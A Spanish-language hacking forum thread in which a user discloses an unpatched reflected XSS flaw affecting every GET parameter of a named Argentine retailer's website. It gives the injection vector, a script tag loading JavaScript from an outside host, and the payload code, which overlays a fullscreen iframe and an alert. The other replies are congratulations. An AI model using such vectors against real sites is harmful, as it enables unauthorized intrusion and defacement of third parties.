send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[XSS] www.aikencomputacion.com.ar

  • 4 Respuestas
  • 1324 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 191
  • Actividad:
    10%
  • Reputación 3
  • Security as art.
    • Ver Perfil
    • Nobody Test Laboratory
  • Twitter: @n0bodysec
« en: Febrero 02, 2016, 07:43:08 pm »
¡Hola, muy buenas!

Estaba buscando para comprarme una GeForce nueva, cuando me topé con mi viejo amigo Aiken Computación (Argentina :P), y como todo amante de la informática y vulnerabilidades a nivel web, sentí la obligación de probar un XSS en una variable GET (jaja).

Tuve la idea de incluir un script JavaScript externo para no líarme bypasseando el addslashes de la web.

(P.D.: Es una "fullscreen" iframe).
[*] Imagen:
Citar

[*] URL: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
[*] Vector utilizado: <script src=https://nobodytl.github.io/codes/js/iframe.js></script>
[*] Variables vulnerables: Todos los GET de la web.
[*] Reportado: SI (no reparado).

En definitiva, el vector final sería: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El código del JavaScript lo dejo aquí debajo (aunque también es visible desde el link del vector) para demostrar como funciona.

Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
document.body.innerHTML = "<iframe style='position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;' src=http://www.underc0de.org/></iframe>";
alert("Underc0de.org");

¡Saludos!
« Última modificación: Marzo 20, 2016, 02:33:27 pm por Nobody »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado MrR0bot

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Febrero 03, 2016, 11:10:04 am »
Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.
"Las organizaciones gastan millones de dólares en firewalls y dispositivos de seguridad, pero tiran el dinero porque ninguna de estas medidas cubre el eslabón más débil de la cadena de seguridad: la gente que usa y administra los ordenadores"
 -- Kevin Mitnick

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1881
  • Actividad:
    23.33%
  • Reputación 14
    • Ver Perfil
« Respuesta #2 en: Febrero 05, 2016, 08:02:58 am »
Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.



Desconectado ro0tmag

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • No sabía que era imposible
    • Ver Perfil
« Respuesta #3 en: Febrero 05, 2016, 09:24:38 am »
 ;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 191
  • Actividad:
    10%
  • Reputación 3
  • Security as art.
    • Ver Perfil
    • Nobody Test Laboratory
  • Twitter: @n0bodysec
« Respuesta #4 en: Febrero 05, 2016, 09:29:28 am »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola,

La imagen que has subido esta caída, prueba a ponerla en otro host.

Lo de modificar, ¿como que no te deja? Deberías encontrar la opción de modificar a la altura de la cabecera de tu post.

Por otro lado, buen descubrimiento.
Gracias por avisar, voy a dejar de usar Google Drive como host jaja, imagen re subida.
¡Gracias!
(P.D.: Me daba error al modificar, una linda blank page :/ jaja).

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy buen descubrimiento, espero seguir viendo aportes tuyos.

Verifica de nuevo si te permite editar el post.

Saludos.
Si, ya se solucionó :-) Gracias por repararlo :P
Gracias, seguriás viendo aportes míos :P jaja

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
;D ;D Excelente!! Vas a comprar algo y terminas buscando una vulnerabilidad! Esa es la actitud
Jaja, no se como llegué a esto (? xD
Jaja gracias, ¡saludos!
« Última modificación: Febrero 22, 2017, 02:12:16 am por rollth »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!